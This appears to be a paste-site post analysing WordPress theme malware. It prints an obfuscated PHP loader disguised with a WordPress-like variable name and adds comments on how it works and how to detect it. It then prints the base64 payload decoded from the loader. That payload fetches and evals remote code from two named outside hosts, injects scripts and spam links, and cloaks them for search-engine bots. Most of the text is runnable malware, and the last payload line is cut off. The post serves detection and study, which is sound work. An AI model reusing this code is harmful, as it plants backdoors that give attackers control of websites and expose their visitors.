scurit

Wordpress theme malware

Dec 15th, 2014
  1. <?php
     // Stage 1 loader. strrev(';)a$(lave') evaluates to 'eval($a);', so create_function()
     // builds an anonymous function that eval()s whatever string it is given. The variable
     // name imitates a WordPress initialiser so the line looks harmless in a theme file.
     // Detection: create_function() or eval() combined with strrev()/base64_decode() in a
     // theme or plugin file is a strong indicator of injected code. create_function() was
     // deprecated in PHP 7.2 and removed in PHP 8.0, so this loader only runs on older PHP.
  2. $wp_user_functions_init = create_function('$a',strrev(';)a$(lave'));
  3. $wp_user_functions_init(strrev(';))"=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"(edoced_46esab(lave'));
  4. ?>
  5.  
  6. Reversing the string passed to $wp_user_functions_init() with strrev() gives:
  7.  
  8. eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdnZXRfdXJsXzk5OScpPT09ZmFsc2Upe2Z1bmN0aW9uIGdldF91cmxfOTk5KCR1cmwpeyRjb250ZW50PSIiOyRjb250ZW50PUB0cnljdXJsXzk5OSgkdXJsKTtpZigkY29udGVudCE9PWZhbHNlKXJldHVybiAkY29udGVudDskY29udGVudD1AdHJ5ZmlsZV85OTkoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZvcGVuXzk5OSgkdXJsKTtpZigkY29udGVudCE9PWZhbHNlKXJldHVybiAkY29udGVudDskY29udGVudD1AdHJ5ZnNvY2tvcGVuXzk5OSgkdXJsKTtpZigkY29udGVudCE9PWZhbHNlKXJldHVybiAkY29udGVudDskY29udGVudD1AdHJ5c29ja2V0Xzk5OSgkdXJsKTtpZigkY29udGVudCE9PWZhbHNlKXJldHVybiAkY29udGVudDtyZXR1cm4gJyc7fX0NCmlmKGZ1bmN0aW9uX2V4aXN0cygndHJ5Y3VybF85OTknKT09PWZhbHNlKXtmdW5jdGlvbiB0cnljdXJsXzk5OSgkdXJsKXtpZihmdW5jdGlvbl9leGlzdHMoJ2N1cmxfaW5pdCcpPT09ZmFsc2UpcmV0dXJuIGZhbHNlOyRjaCA9IGN1cmxfaW5pdCAoKTtjdXJsX3NldG9wdCAoJGNoLCBDVVJMT1BUX1VSTCwkdXJsKTtjdXJsX3NldG9wdCAoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTtjdXJsX3NldG9wdCAoJGNoLCBDVVJMT1BUX1RJTUVPVVQsIDUpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfSEVBREVSLCAwKTskcmVzdWx0ID0gY3VybF9leGVjICgkY2gpO2N1cmxfY2xvc2UoJGNoKTtpZiAoJHJlc3VsdD09IiIpcmV0dXJuIGZhbHNlO3JldHVybiAkcmVzdWx0O319DQppZihmdW5jdGlvbl9leGlzdHMoJ3RyeWZpbGVfOTk5Jyk9PT1mYWxzZSl7ZnVuY3Rpb24gdHJ5ZmlsZV85OTkoJHVybCl7aWYoZnVuY3Rpb25fZXhpc3RzKCdmaWxlJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGluYz1AZmlsZSgkdXJsKTskYnVmPUBpbXBsb2RlKCcnLCRpbmMpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRidWY7fX0NCmlmKGZ1bmN0aW9uX2V4aXN0cygndHJ5Zm9wZW5fOTk5Jyk9PT1mYWxzZSl7ZnVuY3Rpb24gdHJ5Zm9wZW5fOTk5KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZm9wZW4nKT09PWZhbHNlKXJldHVybiBmYWxzZTskYnVmPScnOyRmPUBmb3BlbigkdXJsLCdyJyk7aWYgKCRmKXt3aGlsZSghZmVvZigkZikpeyRidWYuPWZyZWFkKCRmLDEwMDAwKTt9ZmNsb3NlKCRmKTt9ZWxzZSByZXR1cm4gZmFsc2U7aWYgKCRidWY9PSIiKXJldHVybiBmYWxzZTtyZXR1cm4gJGJ1Zjt9fQ0KaWYoZnVuY3Rpb25fZXhpc3RzKCd0cnlmc29ja29wZW5fOTk5Jyk9PT1mYWxzZSl7ZnVuY3Rpb24gdHJ5ZnNvY2tvcGVuXzk5OSgkdXJsKXtpZihmdW5jdGlvbl9leGlzdHMoJ2Zzb2Nrb3BlbicpPT09ZmFsc2UpcmV0dXJuIGZhbHNlOyRwPUBwYXJzZV91cmwoJHVybCk7JGhvc3Q9JHBbJ2hvc3QnXTskdXJpPSRwWydwYXRoJ10uJz8nLiRwWydxdWVyeSd
dOyRmPUBmc29ja29wZW4oJGhvc3QsODAsJGVycm5vLCAkZXJyc3RyLDMwKTtpZighJGYpcmV0dXJuIGZhbHNlOyRyZXF1ZXN0ID0iR0VUICR1cmkgSFRUUC8xLjBcbiI7JHJlcXVlc3QuPSJIb3N0OiAkaG9zdFxuXG4iO2Z3cml0ZSgkZiwkcmVxdWVzdCk7JGJ1Zj0nJzt3aGlsZSghZmVvZigkZikpeyRidWYuPWZyZWFkKCRmLDEwMDAwKTt9ZmNsb3NlKCRmKTtpZiAoJGJ1Zj09IiIpcmV0dXJuIGZhbHNlO2xpc3QoJG0sJGJ1Zik9ZXhwbG9kZShjaHIoMTMpLmNocigxMCkuY2hyKDEzKS5jaHIoMTApLCRidWYpO3JldHVybiAkYnVmO319DQppZihmdW5jdGlvbl9leGlzdHMoJ3RyeXNvY2tldF85OTknKT09PWZhbHNlKXtmdW5jdGlvbiB0cnlzb2NrZXRfOTk5KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnc29ja2V0X2NyZWF0ZScpPT09ZmFsc2UpcmV0dXJuIGZhbHNlOyRwPUBwYXJzZV91cmwoJHVybCk7JGhvc3Q9JHBbJ2hvc3QnXTskdXJpPSRwWydwYXRoJ10uJz8nLiRwWydxdWVyeSddOyRpcDE9QGdldGhvc3RieW5hbWUoJGhvc3QpOyRpcDI9QGxvbmcyaXAoQGlwMmxvbmcoJGlwMSkpOyBpZiAoJGlwMSE9JGlwMilyZXR1cm4gZmFsc2U7JHNvY2s9QHNvY2tldF9jcmVhdGUoQUZfSU5FVCxTT0NLX1NUUkVBTSxTT0xfVENQKTtpZiAoIUBzb2NrZXRfY29ubmVjdCgkc29jaywkaXAxLDgwKSl7QHNvY2tldF9jbG9zZSgkc29jayk7cmV0dXJuIGZhbHNlO30kcmVxdWVzdCA9IkdFVCAkdXJpIEhUVFAvMS4wXG4iOyRyZXF1ZXN0Lj0iSG9zdDogJGhvc3RcblxuIjtzb2NrZXRfd3JpdGUoJHNvY2ssJHJlcXVlc3QpOyRidWY9Jyc7d2hpbGUoJHQ9c29ja2V0X3JlYWQoJHNvY2ssMTAwMDApKXskYnVmLj0kdDt9QHNvY2tldF9jbG9zZSgkc29jayk7aWYgKCRidWY9PSIiKXJldHVybiBmYWxzZTtsaXN0KCRtLCRidWYpPWV4cGxvZGUoY2hyKDEzKS5jaHIoMTApLmNocigxMykuY2hyKDEwKSwkYnVmKTtyZXR1cm4gJGJ1Zjt9fQ0KaWYoZnVuY3Rpb25fZXhpc3RzKCdzdHJfcmVwbGFjZV9maXJzdCcpPT09ZmFsc2Upe2Z1bmN0aW9uIHN0cl9yZXBsYWNlX2ZpcnN0KCRzZWFyY2gsICRyZXBsYWNlLCAkc3ViamVjdCkgeyRwb3MgPSBzdHJpcG9zKCRzdWJqZWN0LCAkc2VhcmNoKTtpZiAoJHBvcyAhPT0gZmFsc2UpIHsJJHN1YmplY3QgPSBzdWJzdHJfcmVwbGFjZSgkc3ViamVjdCwgJHJlcGxhY2UsICRwb3MsIHN0cmxlbigkc2VhcmNoKSk7fQlyZXR1cm4gJHN1YmplY3Q7fX0NCmlmKGZ1bmN0aW9uX2V4aXN0cygnaXNfYm90X3VhJyk9PT1mYWxzZSl7ZnVuY3Rpb24gaXNfYm90X3VhKCl7JGJvdD0wOyR1YT1AJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddO2lmIChzdHJpc3RyKCR1YSwibXNuYm90Iil8fHN0cmlzdHIoJHVhLCJZYWhvbyIpKSRib3Q9MTtpZiAoc3RyaXN0cigkdWEsImJpbmdib3QiKXx8c3RyaXN0cigkdWEsImdvb2dsZWJvdCIpKSRib3Q9MTtyZXR1cm4gJGJvdDt9fQ0KaWYoZnVuY3Rpb25fZXhpc3RzKCdpc19nb29nbGVib3RfaXA
nKT09PWZhbHNlKXtmdW5jdGlvbiBpc19nb29nbGVib3RfaXAoKXskaz0wOyRpcD1zcHJpbnRmKCIldSIsQGlwMmxvbmcoQCRfU0VSVkVSWyJSRU1PVEVfQUREUiJdKSk7aWYgKCgkaXA+PTExMjM2MzExMDQpJiYoJGlwPD0xMTIzNjM5Mjk1KSkkaz0xO3JldHVybiAkazt9fQ0KDQppZihmdW5jdGlvbl9leGlzdHMoJ3VwZGF0ZV9maWxlXzk5OScpPT09ZmFsc2Upew0KZnVuY3Rpb24gdXBkYXRlX2ZpbGVfOTk5KCl7DQoNCgkkdXJpPSJnLnBocD90PW0maT05MDk1M2Q1NjUwMTlmYzUwNTI3NWI2OGNkNDMyYmM3NSI7DQoJJGFjdHVhbDE9Imh0dHA6Ly9wdXBrb25leHMuY29tLyIuJHVyaTsNCgkkYWN0dWFsMj0iaHR0cDovL2Nvb3BlcmpzdXRmOC5ydS8iLiR1cmk7DQoJJHZhbD1nZXRfdXJsXzk5OSgkYWN0dWFsMSk7DQoJaWYgKCR2YWw9PSIiKSR2YWw9Z2V0X3VybF85OTkoJGFjdHVhbDIpOw0KCWlmIChzdHJzdHIoJHZhbCwifHx8Q09ERXx8fCIpKXsNCgkJbGlzdCgkdmFsLCRjb2RlKT1leHBsb2RlKCJ8fHxDT0RFfHx8IiwkdmFsKTsNCgkJZXZhbChiYXNlNjRfZGVjb2RlKCRjb2RlKSk7DQoJfQ0KCXJldHVybiAkdmFsOw0KfQ0KfQ0KDQoNCmlmKGZ1bmN0aW9uX2V4aXN0cygnY2FsbGJhY2tfZnVuY3Rpb25fcGhwJyk9PT1mYWxzZSl7DQpmdW5jdGlvbiBjYWxsYmFja19mdW5jdGlvbl9waHAoJHApIHsNCg0KCWlmIChpc3NldCgkX0NPT0tJRVsnd29yZHByZXNzX3Rlc3RfY29va2llJ10pIHx8IGlzc2V0KCRfQ09PS0lFWyd3cC1zZXR0aW5ncy0xJ10pIHx8IGlzc2V0KCRfQ09PS0lFWyd3cC1zZXR0aW5ncy10aW1lLTEnXSkgfHwgKGZ1bmN0aW9uX2V4aXN0cygnaXNfdXNlcl9sb2dnZWRfaW4nKSAmJiBpc191c2VyX2xvZ2dlZF9pbigpKSApIHsNCgkJcmV0dXJuICRwOw0KCX0NCg0KCWlmIChzdHJpc3RyKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCJ4bWxycGMucGhwIikpew0KCQlyZXR1cm4gJHA7DQoJfQ0KDQoJaWYgKHN0cmlzdHIoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sIndwLWxvZ2luIikpew0KCQlyZXR1cm4gJHA7DQoJfQ0KDQoJaWYgKHN0cmlzdHIoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sIndwLWFkbWluIikpew0KCQlyZXR1cm4gJHA7DQoJfQ0KDQoNCgkkeD0ne29wdGlvbnNfbmFtZXN9JzsNCgkkYnVmPSIiOw0KCSR1cGRhdGU9MDsNCgkkayA9IGdldF9vcHRpb24oJHgpOw0KCWlmICgkaz09PUZBTFNFKXsNCgkJJGVtcD1hcnJheSgpOw0KCQlpZiAoIWFkZF9vcHRpb24oJHgsJGVtcCwnJywnbm8nKSl7DQoJCQlyZXR1cm4gJHA7DQoJCX0NCgkJJHVwZGF0ZT0xOw0KCX1lbHNlew0KCQkkY3RpbWU9dGltZSgpLUAka1sxXTsNCgkJaWYgKCRjdGltZT4zNjAwKjEyKXsNCgkJCSR1cGRhdGU9MTsNCgkJfQ0KCQkNCgl9DQoJaWYgKCR1cGRhdGUpew0KCQkkdmFsPXVwZGF0ZV9maWxlXzk5OSgpOw0KCQkkaz1hcnJheSgpOw0KCQkka1swXT0kdmFsOw0KCQkka1sxXT10aW1lKCk7DQoJCWlmICghdXBkYXRlX29wdGlvbigkeCw
kaykpew0KCQkJcmV0dXJuICRwOw0KCQl9DQoJfQ0KCWlmICghJGsgPSBnZXRfb3B0aW9uKCR4KSl7DQoJCXJldHVybiAkcDsNCgl9DQoNCgkkYnVmPUAka1swXTsNCglpZiAoJGJ1Zj09IiIpew0KCQlyZXR1cm4gJHA7DQoJfQ0KCWxpc3QoJHR5cGUsJHRleHQpPUBleHBsb2RlKCJ8fHwiLCRidWYpOw0KCWlmICgkdGV4dD09IiIpcmV0dXJuICRwOw0KDQoJJHR5cGUrPTA7DQoJJGJvdD0wOw0KCWlmICgkdHlwZT09MCl7DQoJCSRidWYxPUBiYXNlNjRfZGVjb2RlKCR0ZXh0KTsNCgkJbGlzdCgkdGFnanMsJGpzLCR0YWd0ZXh0MSwkdGV4dDEpPUBleHBsb2RlKCJ8fHwiLCRidWYxKTsNCg0KCQlpZiAoc3RyaXN0cigkcCwkdGV4dDEpKXJldHVybiAkcDsNCg0KCQlpZiAoKCR0YWdqcyE9IiIpJiYoc3RyaXN0cigkcCwkdGFnanMpKSl7DQoJCQkkcD1zdHJfcmVwbGFjZV9maXJzdCgkdGFnanMsICRqcy4iICIuJHRhZ2pzLCAkcCk7DQoJCX1lbHNlew0KCQkJJHA9JHAuJGpzOw0KCQl9DQoJCWlmICgoJHRhZ3RleHQxIT0iIikmJihzdHJpc3RyKCRwLCR0YWd0ZXh0MSkpKXsNCgkJCSRwPXN0cl9yZXBsYWNlX2ZpcnN0KCR0YWd0ZXh0MSwgJHRleHQxLiIgIi4kdGFndGV4dDEsICRwKTsNCgkJfWVsc2V7DQoJCQkkcD0kcC4kdGV4dDE7DQoJCX0NCgkJDQoJfWVsc2UNCglpZiAoKCR0eXBlPT0xKXx8KCR0eXBlPT0yKXx8KCR0eXBlPT0zKXx8KCR0eXBlPT00KSl7DQoJCWlmICgoJHR5cGU9PTEpfHwoJHR5cGU9PTQpKXsNCgkJCSRib3Q9aXNfYm90X3VhKCk7DQoJCX0NCgkJaWYgKCgkdHlwZT09Mil8fCgkdHlwZT09Mykpew0KCQkJJGJvdD1pc19nb29nbGVib3RfaXAoKTsNCgkJfQ0KDQoJCWlmICgkYm90KXsNCgkJCSRidWYxPUBiYXNlNjRfZGVjb2RlKCR0ZXh0KTsNCgkJCWxpc3QoJHRhZywkdGV4dDEpPUBleHBsb2RlKCJ8fHwiLCRidWYxKTsNCgkJCWlmICgoJHRhZyE9IiIpJiYoJHRleHQxIT0iIikpew0KDQoJCQkJaWYgKHN0cmlzdHIoJHAsJHRhZykpew0KCQkJCQlpZiAoKCR0eXBlPT0zKXx8KCR0eXBlPT00KSl7DQoJCQkJCQkkcD1Ac3RyX2lyZXBsYWNlKCR0YWcsJHRhZy4iICIuJHRleHQxLCRwKTsgDQoJCQkJCX1lbHNlew0KCQkJCQkJJHA9c3RyX3